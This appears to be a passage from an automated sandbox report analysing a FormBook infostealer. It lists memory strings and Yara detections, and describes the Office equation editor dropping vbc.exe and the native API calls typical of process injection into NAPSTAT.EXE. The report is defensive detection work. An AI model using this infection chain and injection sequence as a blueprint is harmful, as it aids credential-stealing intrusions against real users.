          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.jp/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.uk/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.de/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.aol.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ask.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.auction.co.kr/auction.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
          Source: vbc.exe, vbc.exe, 00000005.00000002.2159504550.0000000000A62000.00000020.00020000.sdmp, vbc.exe, 00000006.00000000.2161211569.0000000000A62000.00000020.00020000.sdmp, vbc.exe, 00000007.00000000.2163492264.0000000000A62000.00000020.00020000.sdmpString found in binary or memory: http://www.churchsw.org/church-projector-project
          Source: vbc.exe, vbc.exe, 00000005.00000002.2159504550.0000000000A62000.00000020.00020000.sdmp, vbc.exe, 00000006.00000000.2161211569.0000000000A62000.00000020.00020000.sdmp, vbc.exe, 00000007.00000000.2163492264.0000000000A62000.00000020.00020000.sdmpString found in binary or memory: http://www.churchsw.org/repository/Bibles/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cjmall.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cjmall.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.clarin.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cnet.co.uk/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cnet.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.excite.co.jp/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.expedia.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.expedia.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2183655398.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gismeteo.ru/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.in/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.jp/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.uk/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.br/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.sa/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.tw/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.cz/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.de/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.es/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.fr/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.it/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.pl/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.ru/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.si/
          Source: explorer.exe, 00000008.00000000.2182363529.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.iask.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.iask.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2183655398.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://www.iis.fhg.de/audioPA
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.linternaute.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.maktoob.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
          Source: explorer.exe, 00000008.00000000.2182363529.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mtv.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mtv.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.myspace.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.najdi.si/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.najdi.si/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.nate.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.neckermann.de/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.neckermann.de/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.news.com.au/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.nifty.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ocn.ne.jp/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.orange.fr/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.otto.de/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozon.ru/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozon.ru/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozu.es/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.pchome.com.tw/favicon.ico
          Source: explorer.exe, 00000008.00000000.2188989063.000000000842E000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
          Source: explorer.exe, 00000008.00000000.2188989063.000000000842E000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.priceminister.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.priceminister.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rakuten.co.jp/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rambler.ru/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rambler.ru/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.recherche.aol.fr/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rtl.de/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rtl.de/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.servicios.clarin.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.shopzilla.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sify.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sogou.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sogou.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.soso.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.soso.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.t-online.de/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.taobao.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.taobao.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.target.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.target.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tchibo.de/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tchibo.de/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tesco.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tesco.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tiscali.it/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.univision.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.univision.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.walmart.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.walmart.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2182363529.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ya.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.yam.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www3.fnac.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www3.fnac.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://z.about.com/m/a08.ico
          Source: vbc.exe, 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
          Source: C:\Users\Public\vbc.exeWindow created: window name: CLIPBRDWNDCLASS

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000007.00000002.2228656305.0000000000070000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2370792812.0000000000140000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2228957990.0000000000340000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2172461567.0000000003281000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2370752737.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2229008620.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2370908208.00000000002B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 7.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000007.00000002.2228656305.0000000000070000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2228656305.0000000000070000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.2370792812.0000000000140000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.2370792812.0000000000140000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2228957990.0000000000340000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2228957990.0000000000340000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.2172461567.0000000003281000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.2172461567.0000000003281000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.2370752737.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.2370752737.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2229008620.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2229008620.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.2370908208.00000000002B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.2370908208.00000000002B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Office equation editor drops PE fileShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\so[1].exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEMemory allocated: 76E20000 page execute and read and write
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEMemory allocated: 76D20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeCode function: 7_2_004181B0 NtCreateFile,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00418260 NtReadFile,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_004182E0 NtClose,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00418390 NtAllocateVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00418392 NtAllocateVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B300C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B30078 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B30048 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B307AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B2F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B2F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B2FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B2FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B2FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B2FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B2FC90 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B2FC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B2FD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B2FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B2FEA0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B2FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B2FFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B310D0 NtOpenProcessToken,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B30060 NtQuerySection,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B301D4 NtSetValueKey,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B3010C NtOpenDirectoryObject,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B31148 NtOpenThread,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B2F8CC NtWaitForSingleObject,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B31930 NtSetContextThread,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B2F938 NtWriteFile,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B2FAB8 NtQueryValueKey,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B2FA20 NtQueryInformationFile,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B2FA50 NtEnumerateValueKey,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B2FBE8 NtQueryVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B2FB50 NtCreateKey,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B2FC30 NtOpenProcess,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B30C40 NtGetContextThread,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B2FC48 NtSetInformationFile,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B31D80 NtSuspendThread,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B2FD5C NtEnumerateKey,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B2FE24 NtWriteVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B2FFFC NtCreateProcessEx,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B2FF34 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_01FF00C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_01FF07AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_01FEF9F0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_01FEF900 NtReadFile,LdrInitializeThunk,
